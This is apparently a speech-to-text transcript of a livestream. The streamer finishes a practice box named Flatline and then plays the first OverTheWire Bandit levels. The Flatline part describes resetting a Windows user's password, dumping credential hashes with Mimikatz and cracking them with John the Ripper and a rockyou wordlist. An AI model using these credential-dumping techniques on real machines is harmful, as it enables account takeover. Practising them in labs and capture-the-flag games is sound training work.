what? Let's actually do it again. We'll do a net user necrotic, and we'll actually put in a password that we know is in Rocky.txt. We'll put in password. See if that actually works first off. It does not meet the requirement length. Okay, let's go ahead and try that again. Net user, or actually let's go ahead and cat. What is it? It's going to be actually user share Rocky.txt. Try that one. And we'll do this password one like right here. Net user necrotic, right? And we'll say that, hey, your password is now this. Net user, my fault. There we go, net user necrotic. His password is now password. Pass please successfully. Alright, let's go ahead and go back into Mimikatz again. And let's see if we can do a LSA dump. LSA/patch again. And let's see if his thing has changed, which it looks like it has, because it used to be the same as the administrator, right? Looks like his password is now changed, right? So let's go ahead and nano back into hash.txt. Throw this one in there now. Let's make sure John the Ripper is actually working properly. We'll do John, and as you can see, we do have password there. Okay? So that is how that works like right there. We can't do a pass to hash or anything like that because we don't have a domain controller, we don't have a ticket system, nothing of that nature. So we can't do any type of attacks with that. We can't take it and do a, try to request TGS, nothing like that. But what we can do is we can try to crack the passwords, which with Mimikatz just showed you how to do that over here, and we were able to crack his password. That is way above and beyond. Well, we changed password and cracked it. Okay, that is way above and beyond what this box offered or what we had to do in it. Thoughts on Over the Wire? Over the Wire is excellent. Everything you can possibly do is excellent. But yeah, Over the Wire is great. Over the Wire. But that is Flatline, and that is way beyond what we'll ever have to do with Flatline. I thought it was a fun one. I feel like we learned a lot. I feel like we went way above and beyond, like I said, which is always better. I feel like it's always better to go above and beyond and just sit there and just wait for it. So yeah, hopefully you guys liked it. Hopefully you enjoyed everything on there, and I'll talk to you later. But yeah, thoughts on Over the Wire, Ghost. Yeah, anything you can possibly do to get more hacking experience, more time on, more of all that stuff, more keyboard time, do it. Anything. Pico CTF, do it. Just every single thing you can possibly do. It doesn't matter. Doesn't matter what it is. Doesn't matter, if you like it or not. I don't think I've really ever done suggested order to play in the games in Bandit. Okay. I don't think I've ever really done over the wire. I've always done under the wire, but let's try over the wire. Level 0. Let's do level 0, level 1. The goal is levels for you to log into the game using SSH. The host to which you need to connect is banditlaboverthewire.org on port 2220. The username is bandit0 and the password is bandit0. So can I just do it like SSH? Like, can I just do something like that? Whoopsie daisy. Can I just do like an SSH and then just that SSH there, TAC P 2220. Can I do something like that? No, I guess so, yes. And I got Cali. I should probably do a bandit at that, huh? So what is it, bandit 0? Is that right? So we'll do username is bandit 0 at there, and then the password could be bandit 0. I did it. All right, cool. That level is done. Let's go into LS-LA. Let's cat the readme, I guess. Is that what I'm doing here? Is that my next password, or is that like a base 64, or what's that? Let's see. Let's go level 0 to 1. The password for the next level is stored in the file called readme. Okay, located in the home directory. Use this password to log into Bandit using SSH. Let me find a username. Okay, so now I just need to do a... Okay, so we already did that, right? So now that should be for Bandit 1, right? So I should be able to exit out here, right? And then SSH Bandit 1, right? And then I should be able to take that readme, correct? And like that, is that correct? Control Shift V. Did I do it? Yes, I did. Okay, cool. Alright, what's that? That's weird, don't you think? What are you? You're very weird. Okay, what's the next one? Level 1 to 2. The password for the next level is stored in a file called TAC, located in the home directory. I noticed that, yeah. Okay, let's, cat like that. Located in home directory. How do we read you? How do we read you? TAC? I don't like this dash file name. I've never done this before. Does there like a slash before it? No. Why do you do this to me? Read and write. Huh, let's go ahead and no, I just want cat file names with TAC. I don't want cat multiple files. I don't think I've ever had to do that before. See if anybody is just yelling at me like, do it like this, dumbass. No, nobody is. Okay. I don't think I've ever had to do this like this before. How do I cat something that's just a TAC? I've never had to do this. I feel like an idiot. I'm on level 2 and I'm stuck. I'm on level 1 really, just trying to get into level 2. I've never had a cat. How do I... What are you? How do I do that? What is the instruction say with that? Okay, file TAC located in the home directory. Command you may need to install this level. lscd cat file. Doing fine. Yeah. File? I mean, it's not definitely not CD. It's in the home directory, right? Yeah. So CD in the bandit 1, right? Yeah. ls-la. We got a TAC there. Yep. So how do we cat that guy? Is that like a thing? What do we fucking? I'm already stuck. I'm already lost. I don't remember file name spaces in Linux now. How to grab file name? Ooh, you know, I might just actually be able to cat and a tab. Huh. Good idea, Ryan. What if I do a cat and a tab? Yeah. Damn, I did like a tac. just wanted to do cat and then that one. I was hoping just like tab will just go all through for me. How do you cat a file? How do you name file spaces? How do you make how do I cat my special characters? Here we go. Use cat T to display tab characters as well as blah. Use cat E to display outside of each line. Cat A to show up all invisible characters. Cat files. It actually says to advanced Google search for dashed file name. Okay. Cat file names with dashed file names. Hold that. How to open it? Yeah. How to open a dash file name? Yeah. Term approach is a lot of misunderstanding because using a DAC as an argument refers to SDN. Okay. So if you want to open a file, you have to specify the full location, such as /tac for each. Okay. So do I have to do it like this? Cat /tac. Genius. See, I know I got it. Easy. Let's go ahead and exit out here. Let's go into Bandit 2, and this is going to be the last one. I think I'm actually still recording, so. This is going to go to a whole bunch of different stuff. Okay, ls tac LA. What we got here? We have spaces in this file name. We just go ahead and cat. Boom. Tab it through. Another way to do it, if you don't have Terminator, is to do something like this. Space in this file name, like that. Okay. Quotation marks through it. Alright, or you could just do spaces that in that. So that one I know. I got that one now, pat. Let's go ahead and exit. We'll do one more because that was an easy one. And we'll go ahead and go into Bandit 3. I feel like they're all going to be easy up to level 10, except for level 2, level 1, or whatever it was. Kick my ass. One freaking LS Tech LA. CD in here. Cat.hidden. I always do LS Tech LA, so I guess that doesn't really teach me anything on that one. And there we go. Okay, so we're getting through it. Like I said, over the wire, under the wire, all those great freaking things. Do them. Cat star head. Ooh, okay, I could try that one. Cat star, he's saying pipe head. So just cat everything, the first line of it. That's not a bad idea. We could try that. Now let me go back into level 0 to 1, I guess, again. I don't remember what the hell the thing was, actually. So we gotta get back to levels. We gotta start over. Uh-oh. Actually, I can just scroll up, huh? Okay, like right here. So which one? You're Bandit 1, so that means I need the stuff. Or can I actually just CD in the Bandit 1? Let's do this. Then you said cat star pipe head. No, doesn't look like that one will work for it. Looks like it does have to be the period slash. So I think that's what you said, right? Cat star, yeah, pipe head. No, yeah, it does have to be the period slash. That's a good idea, though. That was a good try. That was a good idea. The cat everything, he's saying, and then just the first line of it, which is a great idea. But no, this cat period slash that. Okay, permission denied. But we wouldn't have gotten permission not appear with that one. Let's just go ahead and just make absolutely sure. We'll go ahead and we'll get back into 0 actually. Get it up here. We'll go back into 0. And let's do it like this. Bandit 0. Does cat read me right? Bandit 1 right. Control Shift V. There we go. And if you say cat star pipe head, great idea actually. Probably also do the same thing with tail because there's only one line here. But no, yeah, that one does not look like it's working for us with that. Great idea though. So yeah, this is gonna be cat. That's period slash tac. Yeah, I guess you gotta give it the full file name. But that's gonna be it for me tonight. Thanks a lot for joining in, guys. Thanks a lot for coming by. Like I said, I have just gotten back, so I will be doing a lot more of these after 3 months of being gone, living in hotels and stuff like that. So I will be, we're gonna be doing a lot more PowerShell hacking, loading in PowerShell scripts, things like that. Power view, power up, unconstrained constrained delegation, and just a lot of, really just diving deep into PowerShell and PowerShell hacking. All right, thanks a lot again. You guys have a good one, and have a good night.